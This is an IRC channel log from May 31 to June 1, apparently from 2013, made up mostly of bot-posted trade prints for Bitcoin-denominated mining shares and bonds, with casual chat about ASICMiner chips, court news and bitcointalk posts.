17:11:22 [BTCTC] [TAT.ASICMINER] 33 @ 0.024555 = 0.8103 BTC [-] May 31 17:12:47 I did that for bitmit, jurov.. it didn't really turn out worthwhile yet, though I almost broke even May 31 17:12:52 [BTCTC] [CRYPTO-TRADE] 104 @ 0.196001 = 20.3841 BTC [-] May 31 17:12:56 [BTCTC] [CRYPTO-TRADE] 96 @ 0.196 = 18.816 BTC [-] May 31 17:13:16 [MPEX] [S.MPOE] 1300 @ 0.00071934 = 0.9351 BTC [+] May 31 17:13:18 [MPEX] [S.MPOE] 400 @ 0.00071966 = 0.2879 BTC [+] May 31 17:14:25 [BTCTC] [ASICMINER-PT] 3 @ 2.4755 = 7.4265 BTC [+] May 31 17:14:28 [BTCTC] [ASICMINER-PT] 27 @ 2.476 = 66.852 BTC [+] May 31 17:14:33 [BTCTC] [ASICMINER-PT] 10 @ 2.478 = 24.78 BTC [+] May 31 17:14:35 [BTCTC] [ASICMINER-PT] 1 @ 2.4796 BTC [+] May 31 17:14:37 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] May 31 17:14:39 [BTCTC] [ASICMINER-PT] 4 @ 2.48 = 9.92 BTC [+] May 31 17:14:41 [BTCTC] [ASICMINER-PT] 5 @ 2.48 = 12.4 BTC [+] May 31 17:14:45 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] May 31 17:14:47 [BTCTC] [ASICMINER-PT] 5 @ 2.484 = 12.42 BTC [+] May 31 17:14:48 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] May 31 17:19:19 [BTCTC] [COGNITIVE] 3 @ 0.3397 = 1.0191 BTC [-] May 31 17:19:23 [BTCTC] [COGNITIVE] 3 @ 0.3398 = 1.0194 BTC [+] May 31 17:19:25 [BTCTC] [COGNITIVE] 2 @ 0.3398 = 0.6796 BTC [+] May 31 17:19:27 [BTCTC] [COGNITIVE] 1 @ 0.3399 BTC [+] May 31 17:19:29 [BTCTC] [COGNITIVE] 4 @ 0.34 = 1.36 BTC [+] May 31 17:20:58 [BTCTC] [BASIC-MINING] 1 @ 0.65 BTC [+] May 31 17:21:41 [BTCTC] [TAT.ASICMINER] 15 @ 0.0248 = 0.372 BTC [+] May 31 17:26:55 [HAVELOCK] [SDICE] 1 @ 0.1821 BTC [-] May 31 17:28:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.024799 = 0.0992 BTC [-] May 31 17:28:30 [HAVELOCK] [ASICM] 2 @ 0.02499998 = 0.05 BTC [+] May 31 17:28:42 [HAVELOCK] [ASICM] 4 @ 0.02499998 = 0.1 BTC [+] May 31 17:30:01 [BTCTC] [MININGCO.ETF] 1 @ 0.73 BTC [-] May 31 17:30:05 [HAVELOCK] [ASICM] 1 @ 0.02499998 BTC [+] May 31 17:31:32 [MPEX] [S.MPOE] 8700 @ 0.00071966 = 6.261 BTC [+] May 31 17:32:06 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [+] May 31 17:33:01 [BTCTC] [BASIC-MINING] 5 @ 0.65 = 3.25 BTC [+] May 31 17:33:02 [HAVELOCK] [ASICM] 53 @ 0.02499998 = 1.325 BTC [+] May 31 17:35:22 [BTCTC] [RSM] 211 @ 0.008 = 1.688 BTC [-] May 31 17:35:47 [BTCTC] [RSM] 1 @ 0.007039 BTC [-] May 31 17:35:52 [BTCTC] [RSM] 150 @ 0.00703 = 1.0545 BTC [-] May 31 17:39:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.024799 = 0.1488 BTC [-] May 31 17:40:44 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 31 17:43:15 [BTCTC] [CRYPTO-TRADE] 1 @ 0.193017 BTC [-] May 31 17:43:46 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [+] May 31 17:45:32 [HAVELOCK] [ASICM] 47 @ 0.02499998 = 1.175 BTC [+] May 31 17:46:47 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1901 = 0.3802 BTC [-] May 31 17:47:28 [BTCTC] [CRYPTO-TRADE] 7 @ 0.19005 = 1.3304 BTC [-] May 31 17:47:57 [BTCTC] [ASICMINER-PT] 1 @ 2.499999 BTC [+] May 31 17:50:36 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] May 31 17:50:41 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 31 17:52:06 [BTCTC] [PAJKA.BOND] 10 @ 0.1099 = 1.099 BTC [-] May 31 17:52:29 [BTCTC] [B.YABMC] 20 @ 0.01703 = 0.3406 BTC [-] May 31 17:52:31 [BTCTC] [CRYPTO-TRADE] 3 @ 0.19999 = 0.6 BTC [+] May 31 17:53:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.0246 = 0.0492 BTC [-] May 31 17:54:04 [BTCTC] [ASICMINER-PT] 1 @ 2.499999 BTC [-] May 31 17:56:01 [BTCTC] [PAJKA.BOND] 9 @ 0.1099 = 0.9891 BTC [-] May 31 17:56:06 [BTCTC] [PAJKA.BOND] 1 @ 0.11 BTC [+] May 31 17:58:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 31 18:00:10 [HAVELOCK] [ASICM] 1 @ 0.02470879 BTC [-] May 31 18:00:39 [HAVELOCK] [ASICM] 30 @ 0.0246 = 0.738 BTC [-] May 31 18:01:03 [HAVELOCK] [ASICM] 9 @ 0.024501 = 0.2205 BTC [-] May 31 18:01:48 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 31 18:03:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 31 18:03:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02456 BTC [-] May 31 18:03:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.02456 = 0.2456 BTC [-] May 31 18:04:06 [BTCTC] [TAT.ASICMINER] 22 @ 0.024555 = 0.5402 BTC [-] May 31 18:04:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.024551 = 0.6138 BTC [-] May 31 18:04:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.024551 = 0.0491 BTC [-] May 31 18:05:23 [BTCTC] [TAT.ASICMINER] 19 @ 0.024799 = 0.4712 BTC [+] May 31 18:05:40 [BTCTC] [ASICMINER-PT] 1 @ 2.491 BTC [-] May 31 18:05:43 [HAVELOCK] [ASICM] 2 @ 0.02499999 = 0.05 BTC [+] May 31 18:05:57 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19997 BTC [-] May 31 18:05:59 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [+] May 31 18:06:36 [HAVELOCK] [ASICM] 1 @ 0.02499999 BTC [+] May 31 18:06:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.024799 = 0.0744 BTC [+] May 31 18:10:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [+] May 31 18:13:11 [HAVELOCK] [ASICM] 29 @ 0.0249 = 0.7221 BTC [-] May 31 18:13:17 [HAVELOCK] [ASICM] 9 @ 0.024999 = 0.225 BTC [+] May 31 18:13:58 [HAVELOCK] [ASICM] 134 @ 0.025 = 3.35 BTC [+] May 31 18:14:09 [HAVELOCK] [ASICM] 4 @ 0.02511999 = 0.1005 BTC [+] May 31 18:17:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.024799 BTC [+] May 31 18:17:35 [BTCTC] [TAT.ASICMINER] 22 @ 0.024799 = 0.5456 BTC [+] May 31 18:17:36 [BTCTC] [TAT.ASICMINER] 33 @ 0.0248 = 0.8184 BTC [+] May 31 18:17:37 [BTCTC] [TAT.ASICMINER] 52 @ 0.02489 = 1.2943 BTC [+] May 31 18:20:07 [MPEX] [S.MPOE] 6280 @ 0.00071765 = 4.5068 BTC [-] May 31 18:20:09 [MPEX] [S.MPOE] 8720 @ 0.00071687 = 6.2511 BTC [-] May 31 18:21:33 [HAVELOCK] [HIM] 2 @ 2.7 = 5.4 BTC [+] May 31 18:22:22 [BTCTC] [CRYPTO-TRADE] 5 @ 0.19998 = 0.9999 BTC [-] May 31 18:23:59 [BTCTC] [BASIC-MINING] 1 @ 0.65 BTC [+] May 31 18:28:38 [BTCTC] [ASICMINER-PT] 2 @ 2.491 = 4.982 BTC [-] May 31 18:28:42 [BTCTC] [ASICMINER-PT] 13 @ 2.49 = 32.37 BTC [-] May 31 18:28:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.024999 BTC [+] May 31 18:29:43 someone here wanting to buy abou 100 BTC for 0.99 * gox_bid ? May 31 18:30:41 [BTCTC] [ASICMINER-PT] 1 @ 2.4998 BTC [+] May 31 18:30:47 [BTCTC] [BITVPS] 256 @ 0.000706 = 0.1807 BTC [+] May 31 18:32:45 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 31 18:35:56 [HAVELOCK] [ASICM] 1 @ 0.0249 BTC [-] May 31 18:40:56 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 31 18:41:54 http://news.cnet.com/8301-13578_3-57587003-38/judge-orders-google-to-comply-with-fbis-secret-nsl-demands/ May 31 18:43:15 [BTCTC] [PAJKA.BOND] 1 @ 0.11 BTC [+] May 31 18:43:18 does the article mention the best part? May 31 18:43:29 google defeated the fbi in court twice, this was their third attempt May 31 18:46:58 [BTCTC] [BITVPS] 4 @ 0.0007 = 0.0028 BTC [-] May 31 18:48:31 [HAVELOCK] [ASICM] 20 @ 0.0249 = 0.498 BTC [-] May 31 18:49:07 [HAVELOCK] [ASICM] 82 @ 0.0249 = 2.0418 BTC [-] May 31 18:50:02 [BTCTC] [BASIC-MINING] 36 @ 0.65 = 23.4 BTC [+] May 31 18:50:05 truff, got link? or are you referring to that guy that wants to make the first brand of weed May 31 18:51:49 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1997 = 0.3994 BTC [-] May 31 18:52:20 i hadnt seen this May 31 18:52:23 pretty awesome May 31 18:52:53 i just like how he's saying the war on drugs is failing May 31 18:53:02 rare to see that from someone so high up May 31 18:53:36 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [+] May 31 18:55:46 not expecting that to go well May 31 19:06:08 i think the US is more open to legalizing pot than they can let on May 31 19:06:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.024999 BTC [+] May 31 19:08:57 must be april fools day on some other calendar -- dotcom got his stuff back? May 31 19:09:07 unfortunately, our sensational media and high-contrast political parties make real progress fairly impossible May 31 19:09:26 USA ok's sending communications tech to Iran? May 31 19:09:32 something weird May 31 19:11:28 [MPEX] [S.MPOE] 4300 @ 0.00071966 = 3.0945 BTC [+] May 31 19:11:29 [MPEX] [S.MPOE] 10464 @ 0.00071999 = 7.534 BTC [+] May 31 19:11:36 aknap3: yeah, hes getting his stuff back May 31 19:11:43 the US couldnt make an appropriate defense in an NZ court May 31 19:17:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.024999 = 0.225 BTC [+] May 31 19:23:46 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 31 19:24:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.024999 = 0.05 BTC [+] May 31 19:29:27 [BTCTC] [BASIC-MINING] 36 @ 0.65999 = 23.7596 BTC [+] May 31 19:29:28 [BTCTC] [BASIC-MINING] 28 @ 0.66 = 18.48 BTC [+] May 31 19:29:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.024999 = 0.1 BTC [+] May 31 19:33:26 [HAVELOCK] [VTX] 1 @ 0.438 BTC [-] May 31 19:34:16 [HAVELOCK] [VTX] 2 @ 0.4397 = 0.8794 BTC [+] May 31 19:37:32 [MPEX] [S.MPOE] 1236 @ 0.00071999 = 0.8899 BTC [+] May 31 19:37:33 [MPEX] [S.MPOE] 2964 @ 0.00072008 = 2.1343 BTC [+] May 31 19:38:42 [HAVELOCK] [ASICM] 24 @ 0.025 = 0.6 BTC [+] May 31 19:38:53 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 31 19:42:14 [BTCTC] [BTC-BOND] 15 @ 0.01 = 0.15 BTC [+] May 31 19:45:16 [MPEX] [S.MPOE] 6830 @ 0.00071687 = 4.8962 BTC [-] May 31 19:46:39 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [+] May 31 19:48:43 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 31 19:52:39 [HAVELOCK] [ASICM] 8 @ 0.025 = 0.2 BTC [+] May 31 19:56:06 [MPEX] [S.MPOE] 4132 @ 0.00071633 = 2.9599 BTC [-] May 31 20:07:31 [BTCTC] [BASIC-MINING] 22 @ 0.66 = 14.52 BTC [+] May 31 20:14:50 [MPEX] [S.MPOE] 3966 @ 0.00071555 = 2.8379 BTC [-] May 31 20:14:55 [BTCTC] [ASICMINER-PT] 2 @ 2.508 = 5.016 BTC [+] May 31 20:15:12 [BTCTC] [BASIC-MINING] 2 @ 0.66999 = 1.34 BTC [+] May 31 20:29:02 [BTCTC] [MININGCO.ETF] 1 @ 0.76759 BTC [+] May 31 20:31:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.024842 = 0.0994 BTC [-] May 31 20:31:22 [BTCTC] [TAT.ASICMINER] 8 @ 0.024801 = 0.1984 BTC [-] May 31 20:31:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.0248 = 0.0992 BTC [-] May 31 20:31:25 [BTCTC] [TAT.ASICMINER] 12 @ 0.02475 = 0.297 BTC [-] May 31 20:31:26 [BTCTC] [TAT.ASICMINER] 18 @ 0.024701 = 0.4446 BTC [-] May 31 20:31:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] May 31 20:31:29 [BTCTC] [TAT.ASICMINER] 18 @ 0.0247 = 0.4446 BTC [-] May 31 20:31:53 [BTCTC] [ASICMINER-PT] 1 @ 2.508 BTC [+] May 31 20:43:53 [BTCTC] [ASICMINER-PT] 2 @ 2.506 = 5.012 BTC [-] May 31 20:44:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.024999 BTC [+] May 31 20:45:57 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] May 31 20:46:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.0248 = 0.124 BTC [-] May 31 20:48:18 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] May 31 20:49:01 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 31 20:49:30 [BTCTC] [BTC-BOND] 209 @ 0.01 = 2.09 BTC [+] May 31 20:50:28 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] May 31 20:52:17 [MPEX] [S.MPOE] 4388 @ 0.00071633 = 3.1433 BTC [+] May 31 20:52:18 [MPEX] [S.MPOE] 9062 @ 0.00071768 = 6.5036 BTC [+] May 31 20:52:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.0248 = 0.0744 BTC [-] May 31 20:57:42 [MPEX] [S.MPOE] 2841 @ 0.00071502 = 2.0314 BTC [-] May 31 20:57:50 [MPEX] [S.MPOE] 3838 @ 0.00071487 = 2.7437 BTC [-] May 31 20:57:51 [MPEX] [S.MPOE] 8071 @ 0.0007138 = 5.7611 BTC [-] May 31 20:59:17 [BTCTC] [ASICMINER-PT] 1 @ 2.4905 BTC [+] May 31 21:00:15 [BTCTC] [ASICMINER-PT] 9 @ 2.49 = 22.41 BTC [-] May 31 21:00:31 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [-] May 31 21:01:02 [BTCTC] [BITVPS] 7 @ 0.000707 = 0.0049 BTC [+] May 31 21:01:03 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [-] May 31 21:01:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.024999 = 0.25 BTC [+] May 31 21:01:40 [BTCTC] [ASICMINER-PT] 1 @ 2.463 BTC [-] May 31 21:01:55 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] May 31 21:02:08 Chaang-Noi: https://bitcointalk.org/index.php?topic=220079.0 << why is he reselling chips instead of using them to mine? May 31 21:02:19 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 31 21:02:52 [BTCTC] [ASICMINER-PT] 26 @ 2.448 = 63.648 BTC [-] May 31 21:04:07 [MPEX] [S.MPOE] 10679 @ 0.0007138 = 7.6227 BTC [-] May 31 21:04:08 [MPEX] [S.MPOE] 6371 @ 0.00071275 = 4.5409 BTC [-] May 31 21:05:05 fiat500: because you seem to think thats possible May 31 21:05:47 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 31 21:05:48 jesus fuck May 31 21:05:48 him mining? May 31 21:05:56 people still do this: May 31 21:05:57 >Send the payment to 16CXUVcBt41GmqWPXxRfdjqcW5M8axwQEj May 31 21:06:01 >*Note* Please do not send funds from an address you do not control. You will be required to prove ownership of the sending address upon request. May 31 21:06:10 yes make your life harder May 31 21:06:21 fiat500: those are chips May 31 21:06:25 fiat500: they are not on boards May 31 21:06:38 fabbing boards is expensive and difficult for people who dont understand how it works May 31 21:06:59 plus, even if he does fab them, getting space in a DC or building a DC is expensive and difficult May 31 21:07:46 hm, fair enough May 31 21:08:30 he saw an oppertunity to make a buck this way May 31 21:08:32 and hes doing it May 31 21:08:34 [HAVELOCK] [HIM] 1 @ 2.6502 BTC [-] May 31 21:08:35 [HAVELOCK] [HIM] 1 @ 2.6501 BTC [-] May 31 21:08:37 [HAVELOCK] [HIM] 2 @ 2.65 = 5.3 BTC [-] May 31 21:08:38 [HAVELOCK] [HIM] 1 @ 2.61 BTC [-] May 31 21:08:39 [HAVELOCK] [HIM] 5 @ 2.6007 = 13.0035 BTC [-] May 31 21:08:39 [HAVELOCK] [HIM] 1 @ 2.6 BTC [-] May 31 21:08:40 [HAVELOCK] [HIM] 1 @ 2.49 BTC [-] May 31 21:08:41 [HAVELOCK] [HIM] 11 @ 2.489 = 27.379 BTC [-] May 31 21:08:45 i thought he was also purchasing avalon chips for mining under COGNITIVE, but i was mistaken May 31 21:09:05 this makes sense May 31 21:14:01 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 31 21:17:02 [HAVELOCK] [HIM] 1 @ 2.489 BTC [-] May 31 21:17:22 [BTCTC] [BASIC-MINING] 3 @ 0.66 = 1.98 BTC [-] May 31 21:17:24 [BTCTC] [BASIC-MINING] 19 @ 0.66999 = 12.7298 BTC [+] May 31 21:18:00 [BTCTC] [BASIC-MINING] 1 @ 0.66999 BTC [+] May 31 21:18:04 [BTCTC] [BASIC-MINING] 2 @ 0.67 = 1.34 BTC [+] May 31 21:18:43 [HAVELOCK] [VTX] 1 @ 0.4397 BTC [+] May 31 21:19:57 [BTCTC] [ASICMINER-PT] 1 @ 2.478 BTC [-] May 31 21:20:45 [HAVELOCK] [ASICM] 136 @ 0.0249 = 3.3864 BTC [-] May 31 21:29:09 [HAVELOCK] [ASICM] 15 @ 0.024651 = 0.3698 BTC [-] May 31 21:30:21 [BTCTC] [ASICMINER-PT] 2 @ 2.478 = 4.956 BTC [-] May 31 21:30:37 [BTCTC] [BASIC-MINING] 1 @ 0.67 BTC [+] May 31 21:30:43 !ticker h him May 31 21:30:45 [HAVELOCK:HIM] 1D: 2.48900000 / 2.60055135 / 2.70000000 (37 shares, 96.22040000 BTC), 7D: 2.48900000 / 2.63166629 / 2.75000000 (86 shares, 226.32330101 BTC), 30D: 1.52510000 / 2.16032254 / 2.75000000 (674 shares, 1456.05739299 BTC) May 31 21:32:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19 BTC [-] May 31 21:32:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.024999 = 0.125 BTC [+] May 31 21:33:24 [BTCTC] [ASICMINER-PT] 1 @ 2.5039 BTC [+] May 31 21:33:24 [BTCTC] [GSDPT] 6 @ 0.003449 = 0.0207 BTC [+] May 31 21:34:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] May 31 21:41:08 [MPEX] [S.MPOE] 7838 @ 0.00071768 = 5.6252 BTC [+] May 31 21:41:11 [MPEX] [S.MPOE] 6812 @ 0.00072008 = 4.9052 BTC [+] May 31 21:42:51 [BTCTC] [CRYPTO-TRADE] 5 @ 0.19 = 0.95 BTC [-] May 31 21:48:45 [BTCTC] [TAT.ASICMINER] 31 @ 0.024999 = 0.775 BTC [-] May 31 21:48:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.0249 = 0.249 BTC [-] May 31 21:52:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] May 31 21:54:12 [BTCTC] [ASICMINER-PT] 1 @ 2.503899 BTC [-] May 31 22:02:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.025 = 0.15 BTC [+] May 31 22:02:42 [BTCTC] [TAT.ASICMINER] 17 @ 0.025 = 0.425 BTC [+] May 31 22:03:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [+] May 31 22:04:14 [BTCTC] [TAT.ASICMINER] 19 @ 0.02509 = 0.4767 BTC [+] May 31 22:08:09 [MPEX] [S.MPOE] 10024 @ 0.00072008 = 7.2181 BTC [+] May 31 22:08:11 [MPEX] [S.MPOE] 3426 @ 0.00072077 = 2.4694 BTC [+] May 31 22:10:08 https://bitcointalk.org/index.php?topic=221190.0;topicseen May 31 22:13:07 [BTCTC] [TAT.ASICMINER] 30 @ 0.025088 = 0.7526 BTC [-] May 31 22:14:43 lol May 31 22:15:16 this is how I know there are no females in bitcoin May 31 22:15:48 [BTCTC] [BITVPS] 5 @ 0.000714 = 0.0036 BTC [+] May 31 22:16:25 [BTCTC] [BITVPS] 15 @ 0.000715 = 0.0107 BTC [+] May 31 22:16:38 lol don't get scammed! May 31 22:18:18 my mom: "oh and by the way....my YouTube channel is almost at 30,000 hits....hehehe.." May 31 22:20:56 ;;google tat mom yt May 31 22:20:57 Mom forces little kid to get tattoo! - YouTube: ; I'm Raising My Kids in Our Tattoo Shop - Rachel's Story ... - YouTube: ; Abusive Mother Giving Her Baby Boy A Tattoo! - YouTube: May 31 22:21:25 scary shit May 31 22:28:09 ;;google "you have a collect call from your momma" May 31 22:28:10 KENDRICK LAMAR LYRICS - Collect Calls - A-Z Lyrics: ; Look at your reflection tell me who you see – Collect Calls: ; God's will, say a prayer for me mama / If you.. – Collect Calls: (1 more message) May 31 22:28:36 ;;google "you have a collect call from yo momma" May 31 22:28:37 Regular Show - Wikiquote: ; I ain't with the drama / You can meet my llama – Love Sosa: ; Yo Momma Runs: May 31 22:28:40 there we go May 31 22:32:55 regular show is funny May 31 22:33:41 [BTCTC] [ASICMINER-PT] 10 @ 2.48 = 24.8 BTC [-] May 31 22:36:29 [MPEX] [S.MPOE] 10426 @ 0.00071793 = 7.4851 BTC [-] May 31 22:36:43 [BTCTC] [TAT.ASICMINER] 20 @ 0.024733 = 0.4947 BTC [-] May 31 22:36:45 [BTCTC] [TAT.ASICMINER] 30 @ 0.024733 = 0.742 BTC [-] May 31 22:36:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.024732 BTC [-] May 31 22:36:49 [BTCTC] [TAT.ASICMINER] 19 @ 0.02473 = 0.4699 BTC [-] May 31 22:36:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.02472 = 0.0989 BTC [-] May 31 22:36:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.02471 = 0.4942 BTC [-] May 31 22:36:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.024701 = 0.2717 BTC [-] May 31 22:36:59 [BTCTC] [TAT.ASICMINER] 52 @ 0.0247 = 1.2844 BTC [-] May 31 22:37:07 [HAVELOCK] [ASICM] 23 @ 0.024702 = 0.5681 BTC [+] May 31 22:37:13 [HAVELOCK] [ASICM] 1 @ 0.024701 BTC [-] May 31 22:37:21 [HAVELOCK] [ASICM] 4 @ 0.024651 = 0.0986 BTC [-] May 31 22:37:26 [HAVELOCK] [ASICM] 3 @ 0.024898 = 0.0747 BTC [+] May 31 22:37:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.025087 = 0.1003 BTC [+] May 31 22:39:02 [HAVELOCK] [ASICM] 15 @ 0.024899 = 0.3735 BTC [+] May 31 22:44:29 [MPEX] [S.MPOE] 5150 @ 0.00071399 = 3.677 BTC [-] May 31 22:44:30 [MPEX] [S.MPOE] 2139 @ 0.00071275 = 1.5246 BTC [-] May 31 22:49:42 [BTCTC] [ASICMINER-PT] 1 @ 2.494 BTC [+] May 31 22:51:16 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 31 22:52:02 [BTCTC] [ASICMINER-PT] 3 @ 2.4 = 7.2 BTC [+] May 31 22:57:38 [BTCTC] [S.BBET-PT] 1 @ 0.00219 BTC [-] May 31 23:03:50 [HAVELOCK] [ASICM] 23 @ 0.024899 = 0.5727 BTC [+] May 31 23:05:18 [HAVELOCK] [ASICM] 6 @ 0.0249 = 0.1494 BTC [+] May 31 23:06:33 [HAVELOCK] [ASICM] 137 @ 0.0249855 = 3.423 BTC [+] May 31 23:09:26 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] May 31 23:10:08 [BTCTC] [ASICMINER-PT] 3 @ 2.4801 = 7.4403 BTC [-] May 31 23:10:51 hi May 31 23:11:28 i don't understand May 31 23:13:08 nor do we May 31 23:13:50 [BTCTC] [BITVPS] 2 @ 0.000719 = 0.0014 BTC [+] May 31 23:15:51 [MPEX] [S.MPOE] 5200 @ 0.00071391 = 3.7123 BTC [+] May 31 23:17:09 [BTCTC] [GSDPT] 16 @ 0.0032 = 0.0512 BTC [-] May 31 23:17:38 [MPEX] [S.MPOE] 18400 @ 0.00071391 = 13.1359 BTC [+] May 31 23:18:06 [BTCTC] [TAT.ASICMINER] 30 @ 0.025 = 0.75 BTC [-] May 31 23:19:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [-] May 31 23:21:12 lol May 31 23:21:20 poor mada_02002 May 31 23:23:43 [HAVELOCK] [ASICM] 12 @ 0.0249855 = 0.2998 BTC [+] May 31 23:28:24 ;;nethash May 31 23:28:27 109433.100579 May 31 23:28:29 yum May 31 23:28:33 ;;bc,stats May 31 23:28:35 Current Blocks: 238927 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 976 blocks | Next Difficulty In About: 5 days, 5 hours, 15 minutes, and 43 seconds | Next Difficulty Estimate: 14272110.5242 | Estimated Percent Change: 17.43296 May 31 23:28:38 yum yum May 31 23:28:49 I think AM is tamping up May 31 23:28:55 ramping* May 31 23:29:17 avg hashrate for last 6hrs for AM is 30.57TH May 31 23:29:23 [HAVELOCK] [ASICM] 3 @ 0.0249855 = 0.075 BTC [+] May 31 23:36:27 [BTCTC] [ASICMINER-PT] 1 @ 2.4949 BTC [+] May 31 23:36:27 [BTCTC] [BASIC-MINING] 3 @ 0.67 = 2.01 BTC [+] May 31 23:36:27 [BTCTC] [S.DICE-PT] 1 @ 0.002738 BTC [+] May 31 23:36:27 [BTCTC] [COGNITIVE] 2 @ 0.345 = 0.69 BTC [+] May 31 23:36:27 [BTCTC] [CRYPTO-TRADE] 2 @ 0.19 = 0.38 BTC [-] May 31 23:36:28 [BTCTC] [GSDPT] 20 @ 0.003449 = 0.069 BTC [+] May 31 23:36:45 [BTCTC] [PAJKA.BOND] 2 @ 0.11 = 0.22 BTC [+] May 31 23:38:22 [BTCTC] [GSDPT] 15 @ 0.003449 = 0.0517 BTC [+] May 31 23:40:22 [BTCTC] [ASICMINER-PT] 1 @ 2.5039 BTC [+] May 31 23:49:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.025015 = 0.5003 BTC [+] May 31 23:50:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.025016 = 0.075 BTC [+] May 31 23:56:23 [MPEX] [S.MPOE] 4209 @ 0.00071391 = 3.0048 BTC [+] Jun 01 00:00:29 [BTCTC] [S.DICE-PT] 1 @ 0.002729 BTC [-] Jun 01 00:08:20 [BTCTC] [CRYPTO-TRADE] 2 @ 0.19 = 0.38 BTC [-] Jun 01 00:13:37 [MPEX] [S.MPOE] 7841 @ 0.00071413 = 5.5995 BTC [+] Jun 01 00:13:39 [MPEX] [S.MPOE] 1509 @ 0.00071595 = 1.0804 BTC [+] Jun 01 00:19:55 [HAVELOCK] [ASICM] 38 @ 0.024601 = 0.9348 BTC [-] Jun 01 00:19:57 [HAVELOCK] [ASICM] 77 @ 0.0246 = 1.8942 BTC [-] Jun 01 00:19:57 [HAVELOCK] [ASICM] 6 @ 0.0246 = 0.1476 BTC [-] Jun 01 00:19:59 [HAVELOCK] [ASICM] 10 @ 0.0245 = 0.245 BTC [-] Jun 01 00:20:00 [HAVELOCK] [ASICM] 1 @ 0.024403 BTC [-] Jun 01 00:20:01 [HAVELOCK] [ASICM] 1 @ 0.0244 BTC [-] Jun 01 00:22:03 [HAVELOCK] [ASICM] 1 @ 0.0249 BTC [+] Jun 01 00:23:04 [MPEX] [S.MPOE] 1641 @ 0.00071391 = 1.1715 BTC [-] Jun 01 00:23:06 [MPEX] [S.MPOE] 2690 @ 0.00071275 = 1.9173 BTC [-] Jun 01 00:23:08 [MPEX] [S.MPOE] 9300 @ 0.00071273 = 6.6284 BTC [-] Jun 01 00:23:09 [MPEX] [S.MPOE] 4869 @ 0.00071248 = 3.4691 BTC [-] Jun 01 00:37:30 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1955 BTC [+] Jun 01 00:37:41 [HAVELOCK] [ASICM] 38 @ 0.024899 = 0.9462 BTC [-] Jun 01 00:38:56 ThickAsThieves: /lmfao/ Jun 01 00:40:48 feel kinda bad for our friend ken Jun 01 00:45:27 [HAVELOCK] [VTX] 1 @ 